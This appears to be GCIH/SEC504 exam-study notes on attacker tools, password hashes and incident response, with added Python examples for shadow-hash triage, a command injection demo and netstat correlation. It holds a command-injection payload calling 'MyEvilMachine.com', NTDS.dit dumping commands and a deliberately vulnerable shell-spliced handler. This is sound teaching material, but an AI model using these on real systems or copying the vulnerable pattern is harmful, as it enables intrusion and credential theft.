SEC504/GCIH Notes
nmap --reason <-- important: prints why nmap decided a port is open/closed/filtered (e.g. syn-ack, reset, no-response).
nc -l -p 7000 <-- opens listening TCP port 7000 on Linux (traditional netcat syntax; OpenBSD nc uses nc -l 7000). Port numbers only go up to 65535, so a value like 70000 is invalid.
password spraying toolkits (Linux): try one or a few common passwords across many accounts, to avoid lockout thresholds.
online password guessing tools (attack the login service directly): THC Hydra, Burp Suite (Intruder).
PW Hashes:
Windows: LANMAN (LM) and the NT hash (often loosely called the "NTLM hash").
Linux/Unix crypt(3): traditional DES, MD5 ($1$), Blowfish/bcrypt ($2$), SHA-256 ($5$), SHA-512 ($6$).
Deliberately slow KDFs: bcrypt (CPU-intensive), scrypt (memory-hard), PBKDF2 (iterated CPU work).
NT hashes are not to be confused with NTLMv1 and v2, which are authentication algorithms/protocols that use the NT hash as a key.
built-in ntdsutil.exe: on a DC, the IFM snapshot (ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q) writes copies of NTDS.dit and the SYSTEM hive.
Impacket's secretsdump.py then parses those copies offline (secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL) to dump the domain's NT hashes.
Cain & Abel – Windows-based password cracker/sniffer.
Hydra – Linux-based online password guesser (dictionary attacks against network login services).
Mimikatz – post-exploitation tool that dumps passwords/hashes from memory (LSASS).
John the Ripper (Windows/Linux/Unix) – incremental mode is its brute-force mode (tries all character combinations);
single crack mode uses the login name, GECOS/full-name fields and the user's home directory name as candidate PWs
(with mangling rules); wordlist mode uses a dictionary; external mode uses user-supplied C-like functions to generate candidate PWs.
LANMAN – very weak legacy password-hashing mechanism; still stored by default up through Windows XP / Server 2003.
NTLMv1, v2 – authentication algorithms, NOT hashing.
DDoS pulsing zombies – bots flood the target for a short burst (e.g. 10 min), go dormant for a while, then repeat.
The on/off pattern makes the sources hard for the ISP to trace.
HTTP floods – blend into normal traffic patterns best and may be very difficult to detect.
/etc/shadow – PW hashes stored on Unix.
In this file the hash is the second colon-delimited field. The $id$ prefix names the scheme: $6$ is SHA-512, $5$ is
SHA-256, $2$ ($2a$/$2b$/$2y$) is Blowfish/bcrypt, $1$ is MD5; no prefix means traditional 13-character DES crypt.
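Triage helper for the shadow format described above, added to these notes as an example (not SEC504 courseware): it parses each line, classifies the hash by its $id$ prefix, pulls out salt and rounds, and flags locked accounts and fast-to-crack schemes. The shadow lines and hash values are constructed placeholders, not real accounts.

```python
"""Parse /etc/shadow-style lines and classify the crypt(3) hash scheme.
Example added to these notes, not from SEC504; sample data is constructed."""
import re

# crypt(3) scheme ids from the notes, plus the bcrypt variants
SCHEMES = {
    "1": "MD5",
    "2": "Blowfish (bcrypt)", "2a": "Blowfish (bcrypt)",
    "2b": "Blowfish (bcrypt)", "2y": "Blowfish (bcrypt)",
    "5": "SHA-256",
    "6": "SHA-512",
}

# Schemes a cracker gets through fastest; worth flagging for remediation.
WEAK = {"DES", "MD5"}


def classify_hash(field):
    """Return (scheme, salt, rounds_or_cost, locked) for the second shadow field."""
    if not field or field[0] in "!*":
        # '!' or '*' prefix: account locked / no usable password; nothing to crack
        return ("none/locked", None, None, True)
    m = re.match(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?([^$]*)\$", field)
    if not m:
        # no $id$ prefix: traditional 13-char DES crypt, salt is the first 2 chars
        return ("DES", field[:2], None, False)
    scheme_id, rounds, salt = m.groups()
    name = SCHEMES.get(scheme_id, "unknown($%s$)" % scheme_id)
    if scheme_id.startswith("2"):
        # bcrypt layout: $2b$<cost>$<22-char salt><31-char hash>
        salt_and_hash = field.split("$")[3]
        return (name, salt_and_hash[:22], int(salt), False)
    return (name, salt, int(rounds) if rounds else None, False)


def triage_shadow(text):
    """Parse shadow-format text; return one dict per account."""
    out = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        scheme, salt, rounds, locked = classify_hash(fields[1])  # hash = field 2
        out.append({
            "user": fields[0],
            "scheme": scheme,
            "salt": salt,
            "rounds": rounds,
            "locked": locked,
            "weak": scheme in WEAK,
            "last_change_days": int(fields[2]) if len(fields) > 2 and fields[2] else None,
        })
    return out


# Constructed sample; the hash bodies are placeholders, not real password hashes.
SAMPLE = """\
root:$6$rounds=5000$saltsalt$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:18000:0:99999:7:::
legacy:$1$abcdefgh$BBBBBBBBBBBBBBBBBBBBBB:17000:0:99999:7:::
old:XYabcdefghijk:15000:0:99999:7:::
svc:$5$saltsalt$CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:18000:0:99999:7:::
web:$2b$12$abcdefghijklmnopqrstuuDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
locked:!$6$saltsalt$EEEE:18000:0:99999:7:::
"""

if __name__ == "__main__":
    for row in triage_shadow(SAMPLE):
        print("{user:8} {scheme:20} rounds={rounds} locked={locked} weak={weak}".format(**row))
```

Run it against a real shadow file (as root) to see which accounts still sit on DES or MD5 crypt; those are the first ones John will pop.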
Command injection e.g.: http://AFinewebpage/cgi-bin/userData.pl?doc=user1.txt; nslookup
MyEvilMachine.com. Ping also works. Helps determine whether this flaw is present on the web server even when
command output is not shown: the attacker sniffs on their own DNS server (or watches for ICMP) to see whether
the lookup/ping came from the target. The same channel can be used to exfiltrate data.
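The injection above, shown as an added example (not SEC504 code) with a vulnerable CGI-style handler beside a hardened one. The payload keeps the shape from the notes (`user1.txt; <command>`) but uses `echo` in place of nslookup/ping so it runs offline; the document root and sample file are constructed.

```python
"""Vulnerable vs. hardened handling of a 'doc=' parameter.
Example added to these notes, not SEC504 code; sample file is constructed."""
import os
import re
import subprocess
import tempfile

DOCROOT = tempfile.mkdtemp()
with open(os.path.join(DOCROOT, "user1.txt"), "w") as f:
    f.write("hello from user1\n")   # constructed sample document


def vulnerable_read(doc):
    """Mimics a Perl CGI doing `cat $doc` through the shell: the parameter is
    spliced into a command line, so ';' ends the cat and starts a new command."""
    cmd = "cat " + os.path.join(DOCROOT, doc)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_read(doc):
    """Whitelist the filename (no path separators, no shell metacharacters) and
    never invoke a shell: subprocess gets an argv list, so nothing in `doc`
    is ever interpreted as command syntax."""
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}\.txt", doc):
        raise ValueError("rejected document name: %r" % doc)
    path = os.path.join(DOCROOT, doc)
    return subprocess.run(["cat", path], capture_output=True,
                          text=True, check=True).stdout


# Same shape as the notes' payload (`user1.txt; nslookup MyEvilMachine.com`);
# echo stands in for the DNS/ICMP callback so the effect is visible offline.
PAYLOAD = "user1.txt; echo INJECTED"

if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_read(PAYLOAD)))
    try:
        hardened_read(PAYLOAD)
    except ValueError as e:
        print("hardened:", e)
```

When the application does not echo command output (a blind injection), the second line of the vulnerable result is exactly what the attacker cannot see, which is why the notes use an out-of-band DNS lookup or ping to the attacker's host as the signal instead.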
BeEF – Browser Exploitation Framework, a modular framework for controlling hooked browsers.
The attacker must get its JavaScript "hook" loaded in the victim's browser (e.g. via an XSS-vulnerable site); when a victim
visits, the browser polls the BeEF server and the attacker can drive that browser through BeEF's modules.
RAT apps: Poison Ivy, Gh0st RAT, etc
Immunity Debugger – Windows debugger used for malware reverse engineering and exploit development.
Rekall – memory (RAM) acquisition and analysis framework.
netstat -nao | find "ESTABLISHED" – shows local IP and port, remote address and port, state, and the owning PID.
Rekall filtering (EFILTER): select * from pslist() where _EPROCESS.name == "cmd.exe", or where _EPROCESS.pid == 1492.
dlllist 752 lists the DLLs loaded by PID 752; the live-system equivalent is tasklist /m /fi "pid eq 752".
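The netstat/tasklist correlation from the notes, scripted as an added example (not SEC504 courseware): keep the ESTABLISHED rows from `netstat -nao`, attach the owning image name by PID from `tasklist`, then filter by process name or PID the way the Rekall pslist() query does. Both command outputs below are constructed samples, not captures from a real host.

```python
"""Correlate `netstat -nao` with `tasklist` output and filter by name/PID.
Example added to these notes, not SEC504 code; both outputs are constructed."""
import re

NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    10.0.0.5:49712         203.0.113.7:4444       ESTABLISHED     1492
  TCP    10.0.0.5:49800         10.0.0.20:445          ESTABLISHED     4
  TCP    127.0.0.1:49100        127.0.0.1:49101        TIME_WAIT       0
  UDP    0.0.0.0:123            *:*                                    1104
"""

TASKLIST = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0         24 K
svchost.exe                    892 Services                   0      8,512 K
w32time.exe                   1104 Services                   0      2,100 K
cmd.exe                       1492 Console                    1      3,204 K
"""


def parse_tasklist(text):
    """Map PID -> image name from default `tasklist` output."""
    pids = {}
    for line in text.splitlines():
        m = re.match(r"^(\S.*?)\s+(\d+)\s+\S+\s+\d+\s+", line)
        if m:
            pids[int(m.group(2))] = m.group(1)
    return pids


def established(netstat_text, tasklist_text):
    """Rows with State == ESTABLISHED (what `| find "ESTABLISHED"` keeps),
    each joined to its owning process name via the PID column."""
    names = parse_tasklist(tasklist_text)
    rows = []
    for line in netstat_text.splitlines():
        parts = line.split()
        # TCP rows: Proto Local Foreign State PID; UDP rows carry no State.
        if len(parts) != 5 or parts[3] != "ESTABLISHED":
            continue
        pid = int(parts[4])
        rows.append({"proto": parts[0], "local": parts[1], "remote": parts[2],
                     "pid": pid, "image": names.get(pid, "<unknown>")})
    return rows


def where(rows, name=None, pid=None):
    """Filter like `select * from pslist() where _EPROCESS.name == ...`
    or `... where _EPROCESS.pid == ...`."""
    return [r for r in rows
            if (name is None or r["image"].lower() == name.lower())
            and (pid is None or r["pid"] == pid)]


if __name__ == "__main__":
    conns = established(NETSTAT, TASKLIST)
    for r in where(conns, name="cmd.exe"):
        # a shell holding an outbound session to a high port deserves a closer look
        print("%s %s -> %s pid=%d %s" % (r["proto"], r["local"], r["remote"], r["pid"], r["image"]))
```

On a live box the same join is `netstat -nao` plus `tasklist` (or `tasklist /m /fi "pid eq <pid>"` for the loaded modules); in a memory image the pslist()/dlllist equivalents give the same view without trusting the compromised host's tools.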